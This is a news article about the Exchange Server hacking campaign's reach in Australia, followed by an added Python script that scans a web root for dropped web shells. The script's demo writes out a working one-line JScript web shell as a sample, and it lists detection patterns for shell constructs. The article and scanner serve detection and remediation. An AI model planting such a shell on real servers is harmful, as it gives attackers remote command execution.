Thousands of Australian businesses and government agencies could have been affected by a China-based attack on Microsoft Exchange Server.
A set of serious flaws in Microsoft's Exchange Server software led to an aggressive hacking campaign that left companies and government agencies around the world vulnerable.
More than 7,000 businesses using Microsoft Exchange servers in Australia were left exposed to the sophisticated cyberattack. It is unknown how many of them were actually compromised.
As Microsoft scrambled to patch the vulnerabilities, the attackers gained access to email servers and installed web shells: small script files, served by the web server itself, that let the attackers run commands on the machine and return to it at a later date, even after the original flaw has been patched.
The campaign affected Microsoft Exchange Server 2013, 2016 and 2019; the persistence technique is commonly referred to as 'web shelling'.
According to the AFR, Australia ranked fourth in the world, behind the United States, Germany and the UK, among the countries most exposed to the attack.
Among the organisations using the affected email server was the ACT government. A spokesperson confirmed: "All patches were applied within 24 hours of being notified by Microsoft, and there is no evidence of compromise on ACT government systems".
The Australian Cyber Security Centre (ACSC) yesterday advised companies using Microsoft Exchange to patch their servers urgently.
“The ACSC is monitoring the situation and is able to provide assistance and advice as required,” an ACSC alert said.
“Microsoft has identified that if successfully exploited, these CVEs [common vulnerabilities and exposures] together would allow an unauthenticated attacker to write files and execute code with elevated privileges on the underlying Microsoft Windows operating system,” ACSC added today.
“Microsoft has observed instances where the attacker has uploaded web shells to maintain persistent access to compromise Exchange servers.”
Patching closes the entry point but does not remove a web shell that an attacker has already planted. Businesses affected by the hack are therefore advised to follow Microsoft's guidance on detecting and removing web shells, so that the attackers are locked out of their systems for good.
“A single web shell allowing attackers to remotely run commands on a server can have far-reaching consequences,” Microsoft wrote in a blog.
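The two signals the article points at, a new server-side script appearing in the web root and script content that hands request data to a command or code interpreter, are what a practitioner actually hunts for after patching. The following is an added example written for this page, not code from Microsoft, the ACSC or the article; the directory layout, the token list and the sample files are constructed here for illustration, and the real paths on an Exchange host must be substituted when it is run for real.

```python
"""Hunt for web shells dropped on a web server after an Exchange-style intrusion.

Added illustration, not code from the article, Microsoft or the ACSC.
Assumptions (constructed for the example): the web-root layout under a temp
directory, the suspicious-token list, and the sample pages written into it.
"""
import os
import re
import tempfile
import time
from pathlib import Path

# Extensions IIS hands to a script engine; a shell must use one of these to execute.
WEB_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asp"}

# Constructs that typically appear in ASP.NET / JScript web shells: code or a
# command taken from the HTTP request, a spawned process, or reflective loading.
SUSPICIOUS_PATTERNS = [
    re.compile(r'Request\.(Item|Form|QueryString|Headers)'),  # input read from the request
    re.compile(r'Request\s*\[\s*"[^"]+"\s*\]'),               # same, indexer form
    re.compile(r'\beval\s*\(', re.IGNORECASE),                # JScript eval of request data
    re.compile(r'Process(\.Start|StartInfo)'),                # spawning cmd.exe / powershell.exe
    re.compile(r'Assembly\.Load'),                            # loading attacker-supplied .NET code
]


def scan_for_webshells(web_root, modified_since):
    """Return a list of findings for script files under web_root.

    A file is reported if it was modified at or after `modified_since`
    (a Unix timestamp, e.g. the start of the intrusion window) or if its
    content matches any suspicious pattern. Both signals are recorded so an
    analyst can triage: recent + hits is the strongest indication.
    """
    findings = []
    for path in sorted(Path(web_root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        recent = path.stat().st_mtime >= modified_since
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        hits = [p.pattern for p in SUSPICIOUS_PATTERNS if p.search(text)]
        if recent or hits:
            findings.append({"path": str(path), "recent": recent, "hits": hits})
    return findings


def build_sample_webroot():
    """Create a constructed web root with one old benign page, one recently
    modified benign page and one recently dropped shell-like page.
    Returns (root_dir, cutoff_timestamp)."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    now = time.time()
    cutoff = now - 7 * 86400          # assume the intrusion window began a week ago

    # Legitimate logon page from the original install, last touched a month ago.
    old_page = root / "auth" / "logon.aspx"
    old_page.parent.mkdir(parents=True)
    old_page.write_text('<%@ Page Language="C#" %><html><body>Sign in</body></html>')
    os.utime(old_page, (now - 30 * 86400, now - 30 * 86400))

    # Harmless page an admin edited yesterday: flagged for review on timeline only.
    (root / "healthcheck.aspx").write_text('<%@ Page Language="C#" %><p>OK</p>')

    # Constructed one-line shell: evaluates whatever arrives in a request field.
    shell = root / "aspnet_client" / "shell.aspx"
    shell.parent.mkdir(parents=True)
    shell.write_text('<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>')

    return str(root), cutoff


def demo():
    """Run the scan over the constructed web root and return the findings."""
    root, cutoff = build_sample_webroot()
    return scan_for_webshells(root, cutoff)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}: recent={f['recent']} hits={len(f['hits'])}")
```

The timeline signal alone produces noise (the edited health-check page above), which is why the content match is kept alongside it; in practice the list of patterns is extended from the shells actually recovered on a host, and any reported file is compared against a known-good copy of the install rather than judged on the regexes alone.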